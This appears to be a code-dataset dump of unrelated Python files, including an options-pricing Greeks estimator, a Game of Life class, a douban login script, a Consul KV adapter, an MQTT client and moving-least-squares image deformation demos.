    # Step 1: 'spot price' and 'volatility' are updated according to their respective changes
    # Step 2: 'gamma' for call options is calculated
    # Step 3: 'old delta' is calculated and using the calculated 'gamma', 'new delta' is calculated
    # Step 4: 'theta' for call options is calculated
    # Step 5: 'vega' for call options is calculated and 'vega effect' is calculated using this 'vega' and 'change in volatility'
    # Step 6: 'new premium' is calculated initially by effect of 'new delta' followed by effect of 'theta' and 'vega'
    # Thus, 'gamma' is used to calculate 'new delta', and further 'new premium' is calculated with the effect of 'new delta', 'theta' and 'vega'
    print("CALL OPTIONS USING GREEKS")
    for d in database:
        num_remaining_days = d.num_remaining_days
        if user_date != "":
            num_day = calculate_t(d.current_date, user_date)
        else:
            num_day = num_remaining_days
        t = d.t
        # Step 1:
        # NOTE(review): `v` accumulates change_in_volatility once per row,
        # and __main__ already added the change to the global `volatility`
        # before calling this — the shift compounds; confirm intent.
        d.spot_price = d.spot_price + change_in_spot_price
        spot_price = d.spot_price
        v = v + change_in_volatility
        old_premium_list.append(d.old_premium)
        # Step 2:
        gamma = c_gamma(spot_price, int(float(d.strike_price)), t, v, 0.07)
        d.gamma = gamma# print("Gamma is ", gamma)
        # Step 3:
        old_delta = c_delta(spot_price, int(float(d.strike_price)), t, v, 0.07)
        d.old_delta = old_delta# print("Old Delta is ", old_delta)
        new_delta = old_delta + gamma * change_in_spot_price# print("New Delta is ", new_delta)
        d.new_delta = new_delta
        # Step 4:
        theta = c_theta(spot_price, int(float(d.strike_price)), t, v, 0.07)# print("Theta is ", theta)
        d.theta = theta
        # Step 5:
        vega = c_vega(spot_price, int(float(d.strike_price)), t, v, 0.07)
        vega_effect = vega * change_in_volatility
        # Step 6:
        #print("In Theta, Numday = ",num_day)
        new_premium = int(float(d.old_premium)) + ((old_delta + new_delta) / 2.0) * change_in_spot_price# print("Old premium is ", d.old_premium)# print("(After Gamma effect) New premium is ", new_premium)
        new_premium = new_premium + num_day * theta + vega_effect# addition cuz theta already has a negative value
        if new_premium < 0:
            new_premium = 0
        d.new_premium = new_premium
        # remaining values are added to the database
        strike_list.append(d.strike_price)
        new_premium_list.append(d.new_premium)
        curr_date_list.append(d.current_date)
        user_date_list.append(user_date)
        change = float(d.new_premium)-float(d.old_premium)
        change_list.append(change)
        expiry_date_list.append(d.expiry_date)
    # One output row per option: strike, new/old premium, net change, dates.
    df = pd.DataFrame(data = {"strike_price": strike_list, "new_premium": new_premium_list ,"Old Premium":old_premium_list ,"Change":change_list , "current_date":curr_date_list , "Date of New Premium":user_date_list , "Expiry Date":expiry_date_list })
    fname1 = fname[0: -4]
    file_name = "./"+fname1 + "_output.csv"
    df.to_csv(r'Graph//'+file_name, sep = ',', index = False)
def put_greeks(database, fname, change_in_spot_price, change_in_volatility, user_date):
    """Estimate new put premiums from a Greeks-based expansion and write
    'Graph//<fname>_output.csv'. Mirrors call_greeks().

    For each record the spot and volatility are shifted, gamma/delta/theta/
    vega are computed with the put formulae, and the premium is rebuilt as:

        new = old + avg(old_delta, new_delta)*dS + days*theta + vega*dVol

    :param database: option records from process_options().
    :param fname: source CSV name, used to derive the output file name.
    :param change_in_spot_price: shift applied to the underlying spot.
    :param change_in_volatility: volatility shift as a fraction (not %).
    :param user_date: valuation date 'dd-mm-yyyy', or '' to value at expiry.
    """
    strike_list = []
    new_premium_list = []
    old_premium_list = []
    change_list = []
    curr_date_list = []
    user_date_list = []
    expiry_date_list = []
    v = volatility
    print("PUT OPTIONS USING GREEKS")
    for d in database:
        # Theta decays over the days until user_date (if given) or expiry.
        if user_date != "":
            num_day = calculate_t(d.current_date, user_date)
        else:
            num_day = d.num_remaining_days
        t = d.t
        # Step 1: shift spot and volatility.
        # NOTE(review): `v` accumulates change_in_volatility once per row
        # (and __main__ already added it to the global) — kept as-is to
        # stay consistent with call_greeks(); confirm intent.
        d.spot_price = d.spot_price + change_in_spot_price
        spot_price = d.spot_price
        v = v + change_in_volatility
        old_premium_list.append(d.old_premium)
        strike = int(float(d.strike_price))
        # Step 2: gamma.
        gamma = p_gamma(spot_price, strike, t, v, 0.07)
        d.gamma = gamma
        # Step 3: delta, bumped by gamma for the spot move.
        old_delta = p_delta(spot_price, strike, t, v, 0.07)
        d.old_delta = old_delta
        new_delta = old_delta + gamma * change_in_spot_price
        d.new_delta = new_delta
        # Step 4: theta (already negative per day).
        theta = p_theta(spot_price, strike, t, v, 0.07)
        d.theta = theta
        # Step 5: vega effect. Fixed to use p_vega: the original called
        # c_vega — numerically identical (the two formulas match), but the
        # put function is the consistent choice here.
        vega = p_vega(spot_price, strike, t, v, 0.07)
        vega_effect = vega * change_in_volatility
        # Step 6: combine averaged delta, theta decay and vega effect.
        new_premium = int(float(d.old_premium)) + ((old_delta + new_delta) / 2.0) * change_in_spot_price
        new_premium = new_premium + num_day * theta + vega_effect
        if new_premium < 0:
            new_premium = 0
        d.new_premium = new_premium
        strike_list.append(d.strike_price)
        new_premium_list.append(d.new_premium)
        curr_date_list.append(d.current_date)
        user_date_list.append(user_date)
        change_list.append(float(d.new_premium) - float(d.old_premium))
        expiry_date_list.append(d.expiry_date)
    # One output row per option: strike, new/old premium, net change, dates.
    df = pd.DataFrame(data={
        "strike_price": strike_list,
        "new_premium": new_premium_list,
        "Old Premium": old_premium_list,
        "Change": change_list,
        "current_date": curr_date_list,
        "Date of New Premium": user_date_list,
        "Expiry Date": expiry_date_list,
    })
    file_name = "./" + fname[0:-4] + "_output.csv"
    df.to_csv(r'Graph//' + file_name, sep=',', index=False)
#This function stores all data from the file in a variable called 'database' and returns this 'database'
def process_options(fname, init_spot):
    """Load one option-chain CSV from Data/ into a list of mutable records.

    :param fname: CSV file name inside the Data folder.
    :param init_spot: initial spot price stored on every record.
    :return: (database, option_type) — all records plus the option-type
        flag of the *last* row read.
    """
    rows = []
    fields = []
    #MyStruct stores the information for each row in the input file(i.e. values of all columns for each row) and remaining values are filled later
    MyStruct = recordtype("MyStruct", "option_type spot_price num_remaining_days t strike_price old_premium current_date expiry_date moneyness gamma old_delta new_delta theta vega new_premium")
    #database stores the information of all the rows in the file
    database = []
    fname = "Data\\" + fname
    with open(fname, 'r') as csvfile:
        csvreader = csv.reader(csvfile)
        # First row is the header; consumed here and kept in `fields`.
        fields = next(csvreader)
        for row in csvreader:
            rows.append(row)# print(row)
            strike_price = row[0]
            old_premium = row[1]
            current_date = row[2]
            expiry_date = row[3]
            moneyness = row[4]
            option_type = row[5]
            t = calculate_t(current_date, expiry_date)
            num_remaining_days = t
            #Life of the option(t) = number of days till option maturity/number of trading days(252)
            t = t / 252
            # this 't' is used in calculating greeks
            Node = MyStruct(option_type , init_spot, num_remaining_days, t, strike_price, old_premium, current_date, expiry_date, moneyness, "", "", "", "","", "")
            database.append(Node)
    # NOTE(review): option_type is unbound when the file has no data rows —
    # an empty CSV raises NameError here; confirm inputs are never empty.
    return database,option_type
if __name__ == "__main__":
    #read all files from the 'Data' folder
    files = []
    files = get_files("Data")
    print(files)
    #'databases' stores the data of all the files
    databases = []
    # Each row in the file is either a call or a put option
    for file in files:
        db,otype = process_options(file , spotp)
        databases.append(db)
    change_in_spot_price = float(input("Enter the Estimated CHANGE in Spot Price of Underlying\n"))
    change_in_volatility = float(input("Enter Change in % Volatility(+/-)\n")) / 100.0
    #Updating the global Spot Price and Volatility values
    spotp += change_in_spot_price
    volatility += change_in_volatility
    # Choice 1: User can go for expiry date if he wants to know the premium on the date of expiry
    # Or Choice 2: The user can enter a date before the expiry date to know the price of the premium
    rem_flag = int(input("Enter your choice : \n(1)-Expiry day \n(2)-Some Other day\n" ))
    if rem_flag == 2:
        user_date = input("Enter the date for which you want to know the price of premium\nCurrent Date is (20-05-2020)\n")
    else:
        user_date = ""
    #estimating 'new premium' for call and put options
    # File names encode the option type at index 5 ('c' = call, else put).
    for d,f in zip(databases,files):
        if f[5] == "c":
            call_greeks(d , f , change_in_spot_price , change_in_volatility , user_date )
        else:
            put_greeks(d , f , change_in_spot_price , change_in_volatility , user_date )
    # Plot the output graphs for call and put options together('new premium' vs 'strike price')
    plot_multiple(files)
    # Plot graphs for each output file for a comparison between initial curve and final curve of 'new premium' vs 'strike price'
    plot_init_final(files)
    rmse = calculate_rmse()
    print(rmse)
    """plot_calls(files)
    plot_puts(files)
    """
|
12,730 | 066d6d835b5c0bf65d9b3dc17708b472f187824b | #add multiple values to a dictionary key with other rules provided
def update_dictionary(d, key, value):
    """Append value to d[key] if key exists, else to d[2*key] if that
    exists, otherwise create d[2*key] = [value]. Mutates d in place."""
    if key in d:
        target = key
    elif 2 * key in d:
        target = 2 * key
    else:
        d[2 * key] = [value]
        return
    d[target].append(value)
#second option
def update_dictionary(d, key, value):
    """Same contract as the first variant: append under key, falling back
    to 2*key, creating d[2*key] when neither exists."""
    for candidate in (key, 2 * key):
        if candidate in d:
            d[candidate] += [value]
            return
    d[2 * key] = [value]
|
12,731 | 1249a2b66535ef41420c7cd4ee017e610ddefc55 | '''
公告所有接口
'''
import os
from conf import settings
from db import models
def get_all_school_interface():
    """Return (True, [school names]) from the School DB folder, or
    (False, error message) when the folder does not exist."""
    school_dir = os.path.join(settings.DB_PATH, 'School')
    if not os.path.exists(school_dir):
        return False, '没有学校,请联系管理员'
    return True, os.listdir(school_dir)
# 公共登录接口
def login_interface(user, pwd, user_type):
    """Shared login for admin/student/teacher accounts.

    Fixes: removed a stray bare print() before the unknown-type return,
    and corrected the missing-user message typo ('用户民' -> '用户名').

    :param user: account name.
    :param pwd: plain-text password to compare.
    :param user_type: one of 'admin', 'student', 'teacher'.
    :return: (True, message) on success, (False, message) otherwise.
    """
    # Dispatch table instead of an if/elif chain over the three models.
    model_map = {
        'admin': models.Admin,
        'student': models.Student,
        'teacher': models.Teacher,
    }
    model = model_map.get(user_type)
    if model is None:
        return False, '你输入的类型不存在'
    obj = model.select(user)
    if not obj:
        return False, '用户名不存在'
    if pwd == obj.pwd:
        return True, '登陆成功'
    return False, '密码错误'
#获取指定学校的所有课程
def get_all_course_in_school_interface(school_name):
    """Return (True, course list) for the named school, or (False, msg)
    when the school has no courses."""
    school_obj = models.School.select(school_name)
    course_list = school_obj.course_list
    if course_list:
        return True, course_list
    return False, '该学校没有课程'
|
12,732 | 1e43146ff055cba6f3900ab8dab6acedb0e2c809 | import pathlib
import random
import copy
from typing import List, Optional, Tuple
Cell = Tuple[int, int]
Cells = List[int]
Grid = List[Cells]


class GameOfLife:
    """Conway's Game of Life on a bounded (non-wrapping) grid.

    Cells are ints: 1 = alive, 0 = dead. Fixes: save() was missing `self`,
    so instance calls raised TypeError; file handling now uses context
    managers; from_file() strips trailing newlines instead of always
    dropping the last character of each line.
    """

    def __init__(
        self,
        size: Tuple[int, int],
        randomize: bool=True,
        max_generations: Optional[float]=float('inf')
    ) -> None:
        # Grid dimensions.
        self.rows, self.cols = size
        # Previous generation (all dead initially).
        self.prev_generation = self.create_grid()
        # Current generation, optionally randomized.
        self.curr_generation = self.create_grid(randomize=randomize)
        # Maximum number of generations before the game is considered over.
        self.max_generations = max_generations
        # Generation counter, starting at 1.
        self.generations = 1

    def create_grid(self, randomize: bool=False) -> Grid:
        """Create (and assign to curr_generation) a rows x cols grid.

        :param randomize: when True each cell is alive with probability
            1/2; otherwise all cells are dead.
        :return: the new grid.
        """
        if randomize:
            self.curr_generation = [
                [random.randint(0, 1) for _ in range(self.cols)]
                for _ in range(self.rows)
            ]
        else:
            self.curr_generation = [[0] * self.cols for _ in range(self.rows)]
        return self.curr_generation

    def get_neighbours(self, cell: Cell) -> Cells:
        """Return the values of the up-to-8 neighbours of `cell`
        (horizontal, vertical and diagonal; edges are clipped)."""
        row, col = cell
        neighbours = []
        for nr in range(row - 1, row + 2):
            for nc in range(col - 1, col + 2):
                if (nr, nc) == cell:
                    continue
                if 0 <= nr < self.rows and 0 <= nc < self.cols:
                    neighbours.append(self.curr_generation[nr][nc])
        return neighbours

    def get_next_generation(self) -> Grid:
        """Apply Conway's rules once and return the next grid
        (curr_generation is not mutated)."""
        nxt = [[0] * self.cols for _ in range(self.rows)]
        for i in range(self.rows):
            for j in range(self.cols):
                # Cells are 0/1, so summing counts the live neighbours.
                alive_neighbours = sum(self.get_neighbours((i, j)))
                if self.curr_generation[i][j] == 1:
                    # Survival: exactly 2 or 3 live neighbours.
                    if alive_neighbours in (2, 3):
                        nxt[i][j] = 1
                elif alive_neighbours == 3:
                    # Birth: dead cell with exactly 3 live neighbours.
                    nxt[i][j] = 1
        return nxt

    def step(self) -> None:
        """Advance the game by one generation."""
        self.prev_generation = copy.deepcopy(self.curr_generation)
        self.curr_generation = self.get_next_generation()
        self.generations += 1

    @property
    def is_max_generations_exceeded(self) -> bool:
        """Whether the generation counter has reached max_generations."""
        return self.generations >= self.max_generations

    @property
    def is_changing(self) -> bool:
        """Whether the grid changed on the last step."""
        return self.prev_generation != self.curr_generation

    @staticmethod
    def from_file(filename: pathlib.Path) -> 'GameOfLife':
        """Read an initial state (rows of 0/1 digits, one per line)."""
        with open(filename) as fh:
            grid = [
                list(map(int, line.rstrip('\n')))
                for line in fh
                if line.strip()
            ]
        rows = len(grid)
        cols = len(grid[0]) if grid else 0
        life = GameOfLife((rows, cols), randomize=False)
        life.curr_generation = grid
        return life

    def save(self, filename: pathlib.Path) -> None:
        """Write the current state to `filename`, one row of digits per
        line. (The original signature was missing `self`.)"""
        with open(filename, 'w') as fh:
            for row in self.curr_generation:
                fh.write(''.join(map(str, row)) + '\n')
|
12,733 | d65fa3a18b92d5ec46e94ad2e4489d97fe111b39 | from re import sub
from transliterate import translit, exceptions
def make_url(title):
    """Build a URL slug from a title: transliterate to Latin when possible,
    lowercase, and replace separators/punctuation with '-'.

    Fixes: removed the dead initial `url = 'default_url'` assignment
    (always overwritten or shadowed by an uncaught exception) and the
    duplicated regex pattern.

    :param title: source title, possibly non-Latin.
    :return: slug string.
    """
    pattern = r'_| |!|\?|\.|,|\'|\"|;|:'
    try:
        slug_source = translit(title, reversed=True)
    except exceptions.LanguageDetectionError:
        # Already Latin (or undetectable): slugify the title as-is.
        slug_source = title
    return sub(pattern, '-', slug_source.lower())
|
12,734 | 95f077bafc8af35cd4f4f292f63f6aca4531336a | import time
from random import randint
def log(function):
    """Decorator: run `function`, append a timing line to machine.log,
    and return the function's result.

    Fixes: the log file handle was opened but never closed (one leaked
    handle per call) — now a context manager; **kwargs were accepted by
    the wrapper but silently dropped — now forwarded.
    """
    def add_log(*args, **kwargs):
        start_time = time.time()
        result = function(*args, **kwargs)
        # Append mode so successive calls accumulate in one log file.
        with open("machine.log", "a") as f:
            f.write("(rpichon)Running: {}\t\t[ ".format(function.__name__))
            # NOTE: the value is in seconds despite the "ms" label; the
            # format is kept unchanged for log compatibility.
            f.write("exec_time = {:.3f} ms ]\n".format(time.time() - start_time))
        return result
    return add_log
class CoffeeMachine():
    # Class attribute: initial water level. `self.water_level -= 1`
    # creates a per-instance copy on first write.
    water_level = 100
    @log
    def start_machine(self):
        """Return True when there is enough water (> 20) to brew;
        otherwise warn and return False."""
        if self.water_level > 20:
            return True
        else:
            print("Please add water!")
            return False
    @log
    def boil_water(self):
        """Return the boiling status string."""
        return "boiling..."
    @log
    def make_coffee(self):
        """Brew one coffee: consumes 20 units of water over ~2 seconds
        (20 x 0.1s), then prints the status messages."""
        if self.start_machine():
            for _ in range(20):
                time.sleep(0.1)
                self.water_level -= 1
            print(self.boil_water())
            print("Coffee is ready!")
    @log
    def add_water(self, water_level):
        """Refill by `water_level` units after a random 1-5 second delay."""
        time.sleep(randint(1, 5))
        self.water_level += water_level
        print("Blub blub blub...")
if __name__ == "__main__":
    machine = CoffeeMachine()
    # Each successful brew consumes 20 units; once water_level drops to 20,
    # start_machine() refuses to brew until add_water() refills.
    for i in range(0, 5):
        machine.make_coffee()
    machine.make_coffee()
    machine.add_water(70)
|
12,735 | 867bec25c0d83ab5aed558a6d2de255d00e5f4f1 | import time
import requests
from fake_useragent import UserAgent
# Randomized User-Agent plus the login-popup Referer expected by douban.
ua = UserAgent(verify_ssl=False)
headers = {
    'User-Agent' : ua.random,
    'Referer' : 'https://accounts.douban.com/passport/login_popup?login_source=anony'
}
s = requests.Session()
# Session object: cookies persist across every request made from the same
# Session instance, and urllib3 connection pooling is used underneath --
# repeated requests to the same host reuse the TCP connection, which gives
# a significant performance boost.
login_url = 'https://accounts.douban.com/j/mobile/login/basic'
# NOTE(review): the account name is hard-coded and the password field is
# blank -- credentials should come from the environment or a secrets store,
# never from source control.
form_data = {
    'ck':'',
    'name':'15055495@qq.com',
    'password':'',
    'remember':'false',
    'ticket':''
}
# Fetch cookies from the login page before POSTing the form.
pre_login = 'https://accounts.douban.com/passport/login'
pre_resp = s.get(pre_login, headers=headers)
response = s.post(login_url, data=form_data, headers=headers, cookies=s.cookies)
# After logging in, follow-up requests can reuse this session, e.g.:
# url2 = 'https://accounts.douban.com/passport/setting'
# response2 = s.get(url2,headers = headers)
# response3 = newsession.get(url3, headers = headers, cookies = s.cookies)
# with open('profile.html','w+') as f:
#     f.write(response2.text)
|
12,736 | 1e79f75f2171cc1dc550697005395f5f101f73ce | from consul import Consul
from typing import Any, Union, Mapping
from dataclasses import dataclass
from resource_it import Resource, ResourceNotFoundError
import cfg_it
import log_it
# Module-level logger, named after this module.
log = log_it.logger(__name__)
@cfg_it.props
class cfg:
    # Default Consul agent host; overridden per-resource by the URL netloc
    # in Consul_KV.init().
    consul_host: str = "localhost"
class Consul_KV(Resource):
    """Resource adapter exposing a single Consul key/value entry via CRUD."""

    @dataclass
    class meta_cls:
        # Key path inside Consul's KV store (resource URL path, no leading /).
        key: str
        # consul.Consul client instance bound to the resolved host.
        consul: Any

    @dataclass
    class data_cls:
        # Decoded value of the key; empty string when unset.
        value: Union[str, Mapping] = ""

    def init(self):
        """Resolve the Consul host (URL netloc wins over cfg) and build meta."""
        consul_host = self.url.netloc or cfg.consul_host
        self.meta = Consul_KV.meta_cls(
            key=self.url.path.lstrip("/"),
            consul=Consul(host=consul_host),
        )

    def create(self, **data):
        """Write data["value"] under the key (Consul's put upserts)."""
        log.debug(f"consul-kv: create '{self.meta.key}'")
        self.meta.consul.kv.put(self.meta.key, data["value"])

    def read(self):
        """Fetch the key and store its UTF-8 decoded value on self.data.

        Raises ResourceNotFoundError when the key is absent (kv.get returns
        a None payload) or carries no decodable value.
        """
        req_index, req_obj = self.meta.consul.kv.get(self.meta.key)
        try:
            self.data = Consul_KV.data_cls(
                value=req_obj["Value"].decode("utf-8"),
            )
        except (TypeError, KeyError, AttributeError) as e:
            # req_obj is None for a missing key / "Value" may be absent or
            # None; chain the original cause so debugging keeps the context.
            raise ResourceNotFoundError from e

    def update(self, **data):
        """Overwrite the key with data["value"]."""
        log.debug(f"consul-kv: update '{self.meta.key}'")
        self.meta.consul.kv.put(self.meta.key, data["value"])

    def delete(self):
        """Deletion is intentionally unsupported for this resource."""
        raise NotImplementedError("ConsulKV: delete")
|
12,737 | 75ace70625d0652fb163b4239d9182f3e84496dd | import paho.mqtt.client as mqtt
from settings import Settings, historical_settings
import json
import sqlite3
from printer import a_print
from config import Config
class MyMQTTClass(mqtt.Client):
    """MQTT client that appends each received settings payload to
    historical_settings and logs activity via a_print.

    NOTE(review): with paho-mqtt's callback API v1, method callbacks on a
    Client subclass normally receive (self, client, userdata, ...);
    on_connect below takes one parameter fewer than that convention --
    confirm against the installed paho-mqtt version.
    """
    def on_connect(self, mqttc, flags, rc):
        # rc == 0 means the broker accepted the connection.
        if rc==0:
            print("connected OK")
        else:
            print("Bad connection Returned code=",rc)
    def on_message(self, mqttc, obj, msg):
        # print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload))
        # print('Appending to historical_settings')
        a_print('Recieved new settings', 'mqtt')
        a_print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload), 'mqtt')
        # Payload is JSON; Settings(insert=True) presumably persists it --
        # TODO confirm against the Settings class.
        received_data = json.loads(msg.payload)
        historical_settings.append(Settings(received_data, insert=True))
        a_print('Appended to historical_settings', 'mqtt')
    def on_publish(self, mqttc, obj, mid):
        # print("mid: "+str(mid))
        a_print("mid: "+str(mid), 'mqtt')
    def on_subscribe(self, mqttc, obj, mid, granted_qos):
        # print("Subscribed: "+str(mid)+" "+str(granted_qos))
        a_print("Subscribed: "+str(mid)+" "+str(granted_qos), 'mqtt')
    def on_log(self, mqttc, obj, level, string):
        # print(string)
        a_print(string, 'mqtt')
    def run(self):
        # Retry until the broker is reachable, then subscribe (QoS 1) and
        # start the network loop in a background thread.
        # NOTE(review): the bare except hides all errors and the loop spins
        # with no delay between attempts -- consider narrowing the exception
        # and adding a backoff sleep.
        while True:
            try:
                self.connect(Config.broker)
                break
            except:
                pass
        self.subscribe(Config.topic, 1)
        self.loop_start()
|
12,738 | 337d84fe3ca5b731386fd9825917d1ebca264863 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Image deformation using moving least squares
@author: Jian-Wei ZHANG
@email: zjw.cs@zju.edu.cn
@date: 2017/8/8
@update: 2020/9/25
@update: 2021/7/14: Simplify usage
@update: 2021/12/24: Fix bugs and add an example of random control points (see `demo2()`)
"""
import time
import numpy as np
import matplotlib.pyplot as plt
try:
import torch # Install PyTorch first: https://pytorch.org/get-started/locally/
from img_utils_pytorch import (
mls_affine_deformation as mls_affine_deformation_pt,
mls_similarity_deformation as mls_similarity_deformation_pt,
mls_rigid_deformation as mls_rigid_deformation_pt,
)
device = torch.device("cuda:0" if torch.cuda.is_available() else 'cpu')
except ImportError as e:
print(e)
from img_utils import (
mls_affine_deformation,
mls_similarity_deformation,
mls_rigid_deformation
)
from PIL import Image
def demo():
    """Deform images/toy.jpg with 7 fixed control-point pairs (p -> q) and
    show the affine / similarity / rigid MLS variants side by side."""
    p = np.array([
        [155, 30], [155, 125], [155, 225],
        [235, 100], [235, 160], [295, 85], [293, 180]
    ])
    q = np.array([
        [211, 42], [155, 125], [100, 235],
        [235, 80], [235, 140], [295, 85], [295, 180]
    ])
    image = np.array(Image.open("images/toy.jpg"))
    height, width, _ = image.shape
    # Dense pixel grid over the image; vy/vx follow numpy.meshgrid layout.
    gridX = np.arange(width, dtype=np.int16)
    gridY = np.arange(height, dtype=np.int16)
    vy, vx = np.meshgrid(gridX, gridY)
    # Each deformation returns per-pixel source coordinates; indexing the
    # image with tuple(...) gathers the warped pixels (backward mapping).
    affine = mls_affine_deformation(vy, vx, p, q, alpha=1)
    aug1 = np.ones_like(image)
    aug1[vx, vy] = image[tuple(affine)]
    similar = mls_similarity_deformation(vy, vx, p, q, alpha=1)
    aug2 = np.ones_like(image)
    aug2[vx, vy] = image[tuple(similar)]
    rigid = mls_rigid_deformation(vy, vx, p, q, alpha=1)
    aug3 = np.ones_like(image)
    aug3[vx, vy] = image[tuple(rigid)]
    fig, ax = plt.subplots(1, 4, figsize=(12, 4))
    ax[0].imshow(image)
    ax[0].set_title("Original Image")
    ax[1].imshow(aug1)
    ax[1].set_title("Affine Deformation")
    ax[2].imshow(aug2)
    ax[2].set_title("Similarity Deformation")
    ax[3].imshow(aug3)
    ax[3].set_title("Rigid Deformation")
    for x in ax.flat:
        x.axis("off")
    plt.tight_layout(w_pad=0.1)
    plt.show()
def demo_torch():
    """PyTorch variant of demo(): same control points and image, run on
    `device` with the *_pt deformation functions."""
    p = torch.from_numpy(np.array([
        [155, 30], [155, 125], [155, 225],
        [235, 100], [235, 160], [295, 85], [293, 180]
    ])).to(device)
    q = torch.from_numpy(np.array([
        [211, 42], [155, 125], [100, 235],
        [235, 80], [235, 140], [295, 85], [295, 180]
    ])).to(device)
    image = torch.from_numpy(np.array(Image.open("images/toy.jpg"))).to(device)
    height, width, _ = image.shape
    gridX = torch.arange(width, dtype=torch.int16).to(device)
    gridY = torch.arange(height, dtype=torch.int16).to(device)
    vy, vx = torch.meshgrid(gridX, gridY)
    # !!! Pay attention !!!: the shape of returned tensors are different between numpy.meshgrid and torch.meshgrid
    # (torch defaults to 'ij' indexing, hence the transposes below).
    vy, vx = vy.transpose(0, 1), vx.transpose(0, 1)
    affine = mls_affine_deformation_pt(vy, vx, p, q, alpha=1)
    aug1 = torch.ones_like(image).to(device)
    aug1[vx.long(), vy.long()] = image[tuple(affine)]
    similar = mls_similarity_deformation_pt(vy, vx, p, q, alpha=1)
    aug2 = torch.ones_like(image).to(device)
    aug2[vx.long(), vy.long()] = image[tuple(similar)]
    rigid = mls_rigid_deformation_pt(vy, vx, p, q, alpha=1)
    aug3 = torch.ones_like(image).to(device)
    aug3[vx.long(), vy.long()] = image[tuple(rigid)]
    fig, ax = plt.subplots(1, 4, figsize=(12, 4))
    ax[0].imshow(image)
    ax[0].set_title("Original Image")
    ax[1].imshow(aug1.cpu().numpy())
    ax[1].set_title("Affine Deformation")
    ax[2].imshow(aug2.cpu().numpy())
    ax[2].set_title("Similarity Deformation")
    ax[3].imshow(aug3.cpu().numpy())
    ax[3].set_title("Rigid Deformation")
    for x in ax.flat:
        x.axis("off")
    plt.tight_layout(w_pad=0.1)
    plt.show()
def demo2():
    """Smiled Monalisa: rigid MLS deformation of images/monalisa.jpg with
    (1) hand-picked control points and (2) random control points.

    Bug fix: the random-points branch called the PyTorch variant
    (mls_rigid_deformation_pt) on NumPy arrays -- that function expects
    tensors and is not even defined when the torch import at module top
    failed.  It now uses the NumPy implementation, like branch (1).
    """
    np.random.seed(1234)
    image = np.array(Image.open("images/monalisa.jpg"))
    height, width, _ = image.shape
    # Define deformation grid
    gridX = np.arange(width, dtype=np.int16)
    gridY = np.arange(height, dtype=np.int16)
    vy, vx = np.meshgrid(gridX, gridY)
    # ================ Control points group 1 (manually specified) ==================
    # Corner points are included so the image borders stay fixed.
    p1 = np.array([[0, 0], [517, 0], [0, 798], [517, 798],
        [140, 186], [135, 295], [181, 208], [181, 261], [203, 184], [202, 304], [225, 213],
        [225, 243], [244, 211], [244, 253], [254, 195], [281, 232], [252, 285]
    ])
    q1 = np.array([[0, 0], [517, 0], [0, 798], [517, 798],
        [140, 186], [135, 295], [181, 208], [181, 261], [203, 184], [202, 304], [225, 213],
        [225, 243], [238, 207], [237, 261], [253, 199], [281, 232], [249, 279]
    ])
    rigid1 = mls_rigid_deformation(vy, vx, p1, q1, alpha=1)
    aug1 = np.ones_like(image)
    aug1[vx, vy] = image[tuple(rigid1)]
    # ====================== Control points group 2 (random) =======================
    p2 = np.stack((
        np.random.randint(0, height, size=13),
        np.random.randint(0, width, size=13),
    ), axis=1)
    q2 = p2 + np.random.randint(-20, 20, size=p2.shape)
    # NumPy inputs -> NumPy implementation (was mls_rigid_deformation_pt).
    rigid2 = mls_rigid_deformation(vy, vx, p2, q2, alpha=1)
    aug2 = np.ones_like(image)
    aug2[vx, vy] = image[tuple(rigid2)]
    fig, ax = plt.subplots(1, 3, figsize=(13, 6))
    ax[0].imshow(image)
    ax[0].set_title("Original Image")
    ax[1].imshow(aug1)
    ax[1].set_title("Manually specified control points")
    ax[2].imshow(aug2)
    ax[2].set_title("Random control points")
    for x in ax.flat:
        x.axis("off")
    plt.tight_layout(w_pad=1.0, h_pad=1.0)
    plt.show()
def read_tif(frame):
    """Return (image, label) numpy arrays for page *frame* of the
    multi-page training TIFF stacks in images/."""
    def _load_page(path):
        # seek() selects the requested page of the multi-frame TIFF.
        pil_img = Image.open(path)
        pil_img.seek(frame)
        return np.array(pil_img)

    image = _load_page("images/train-volume.tif")
    label = _load_page("images/train-labels.tif")
    return image, label
def demo3():
    """Augment one EM image/label pair with random control points and show
    all three MLS deformation modes applied to both image and label."""
    image, label = read_tif(1)
    # Symmetric padding gives the random control points room near borders.
    image = np.pad(image, ((30, 30), (30, 30)), mode='symmetric')
    label = np.pad(label, ((30, 30), (30, 30)), mode='symmetric')
    height, width = image.shape
    gridX = np.arange(width, dtype=np.int16)
    gridY = np.arange(height, dtype=np.int16)
    vy, vx = np.meshgrid(gridX, gridY)
    def augment(p, q, mode='affine'):
        # Apply the selected MLS transform to image and label with the
        # same coordinate field so they stay aligned.
        if mode.lower() == 'affine':
            transform = mls_affine_deformation(vy, vx, p, q, alpha=1)
        elif mode.lower() == 'similar':
            transform = mls_similarity_deformation(vy, vx, p, q, alpha=1)
        elif mode.lower() == 'rigid':
            transform = mls_rigid_deformation(vy, vx, p, q, alpha=1)
        else:
            raise ValueError
        aug_img = np.ones_like(image)
        aug_img[vx, vy] = image[tuple(transform)]
        aug_lab = np.ones_like(label)
        aug_lab[vx, vy] = label[tuple(transform)]
        return aug_img, aug_lab
    fig, ax = plt.subplots(2, 4, figsize=(12, 6))
    ax[0, 0].imshow(image, cmap='gray')
    ax[0, 0].set_title("Original Image")
    ax[1, 0].imshow(label, cmap='gray')
    ax[1, 0].set_title("Original Label")
    np.random.seed(1234)
    p = np.c_[np.random.randint(0, height, size=32), np.random.randint(0, width, size=32)]
    q = p + np.random.randint(-15, 15, size=p.shape)
    q[:, 0] = np.clip(q[:, 0], 0, height)
    q[:, 1] = np.clip(q[:, 1], 0, width)
    p = np.r_[p, np.array([[0, 0], [0, width - 1], [height - 1, 0], [height - 1, width - 1]])] # fix corner points
    q = np.r_[q, np.array([[0, 0], [0, width - 1], [height - 1, 0], [height - 1, width - 1]])] # fix corner points
    for i, mode in enumerate(['Affine', 'Similar', 'Rigid']):
        aug_img, aug_lab = augment(p, q, mode)
        ax[0, i + 1].imshow(aug_img, cmap='gray')
        ax[0, i + 1].set_title(f"{mode} Deformated Image")
        ax[1, i + 1].imshow(aug_lab, cmap='gray')
        ax[1, i + 1].set_title(f"{mode} Deformated Label")
    for x in ax.flat:
        x.axis('off')
    plt.tight_layout(w_pad=1.0, h_pad=1.0)
    plt.show()
def benchmark_numpy(image, p, q):
    """Run one rigid MLS deformation of *image* (NumPy path) and return it."""
    height, width = image.shape[:2]
